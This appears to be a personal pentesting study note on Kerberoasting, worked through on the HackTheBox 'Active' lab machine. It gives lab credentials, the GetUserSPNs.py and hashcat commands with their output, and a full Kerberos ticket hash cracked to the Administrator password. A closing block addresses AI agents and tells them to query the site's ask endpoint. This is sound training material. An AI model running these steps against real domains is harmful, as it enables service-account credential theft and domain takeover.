# Kerberoasting(Cleanin)

### What is Kerberoasting?

In kerberos auth flow when you request TGS-REQ:

When a user wants to access a service, they send a TGS-REQ to the TGS with their TGT and the SPN of the service they want. The TGS validates the TGT and hands back a service ticket encrypted with the service account's password hash. The user receives this ticket and presents it to the service.

Here's the thing, **the KDC never checks if you actually need access to that service.** Any authenticated domain user can request a service ticket for any SPN registered in the domain. The KDC just hands it out. And you get to keep that ticket.

The service ticket is encrypted with the service account's hash. You have the ticket. The hash is inside it. Take it offline and crack it , this is what kerberoasting is.

Any authenticated user (including low-privilege accounts) can request a TGS for a specific SPN.

active machine example:

<figure><img src="/files/IRBTATFIJP13fhnV8u2r" alt=""><figcaption></figcaption></figure>

pass:

```
GPPstillStandingStrong2k18
```

user:

```
active.htb\SVC_TGS
```

Tool GetUsersSPN.py, used only with valid credentials to find SPN

```
GetUserSPNs.py -request -dc-ip 10.129.209.209 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 00:36:40.351723  2026-04-18 04:58:23.354942



[-] CCache file is not found. Skipping...


```

```
##hashcat
hashcat -m 13100 -a 0 hash /wordlists/rockyou.txt --force
```

result:

```
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7ecc20df66221ea1785c0d6803b34882$028bf8c85a42335013839c9cfb8c9c46e81313f729243d7b4e2feff639db18db1c0a07308cfb1d2ee375bfa3bdaecd8f57730c9998413f2e4ee9aadf14fc7d4c1a8badd2be60e74baac91ae0d5b97b334fee58f0673b8fac8495a6821b131f50f13ac18714263f4b260e6403c1643dca16d632dbc706f747230303d757db6b762f969eaf54a8243ac19ac605141ae0f3e7160e527b9155469c7d6929ee9a75de10c9ad6b6bdc1e0a6bfdd9a2b482c5e02aa8b691cec6764a8f2fb86fc674e6500e27fafddea95c772516836728ea404208ed704d098ade76a6fb48b87a69bd6601c51174abd9e2cb38b0ba27910bee1cdd35aec9108fca845c6b9058e902fbb3345b37f3823a526b43250018198256c9c5d1cf703af08323cd7d2cdf7a1c69cd74b94fbc45e44669ccea3b59089b7aca2eed9a454389635510fd67ac245db720c779ad6b20dcf1bc0d8651755d8e768dc44f2679d3d8a9a8f8044900f0e6892562bf44c43b0dbce1c2effda24c3b7d1bf48ef029f5a48c26150958ce9a709dda4881ccc538547c6ff06e122f8606a5cc2c9550fcf5483f4455f205769f372f66f343524b8912f489e1657c935e03a311981fc8b368e1ed25d51fb80cd54fef37d75917d7e64262f46a3eb9f0fa7f912ffcf064da457ad35b93778f1460f9a5cab09e96bf49e3bed8fbc372c7fa2e8b61088b3f6c95986c6770ec31992ce5a0a7346cb6fc58c8d87788bd699344ee4db3b959070dcb93f1728d102b06518f15e3d605d5ed0f51748570437ae39f9bf9f6fb7408378914c90f61abe2f2126e653115410b702c9c2555645a4488c09c4f22df6b35ea759c4a05ccd95cd5420d1e905430499baa3cbdc5ce1e50311f1b5a2d8cb6698036fa85e66bd52a0efc314b90fb0e689d7e7ad0267e8cb9fdd7dca4b42877abf27dcd9c2a48c239f5431aaf8de150d652b1977fd92080b0f727c9712c0f2aeaf5fcf487e7628c34db3536c9829b8604445f72b5fbd040f9386ec07ccc8b3ab1f02b6f9c2969ed6350ccb70856a96cede3394cc7dd4d4a7f8c898719fa9d5fb997d82d680fbe9a392f55f60dc8845372faab0a167f36141138bc3b98b5034211851ae13e3dbc109e85e06ce120625dd49fe924aaf462a07d8d19f2a0a9a7212898ccb9c4854ac0a7ca75f0752c42de0a6a578be9d25951fddf5f3f368958c4b84fd8bb870bd4805799e5be470f6d54587b326b93b180918d5a75efce326d007e7ca754d8bd594f:Ticketmaster1968
```

user and pass:

```
administrator:Ticketmaster1968
```

Kerberoasting abuses a design characteristic of Kerberos where service tickets are encrypted with service account credentials, weak or poorly managed service account passwords make this attack practical.

* If the service account password is weak → it gets cracked quickly
* **Service accounts often have high privileges**
* **Passwords may be static for years** (unlike user accounts)
* **Older encryption types** (like RC4) make cracking easier
* Large number of SPNs increases attack surface


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kaizoku.gitbook.io/notes/active-directory/kerberoasting-cleanin.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.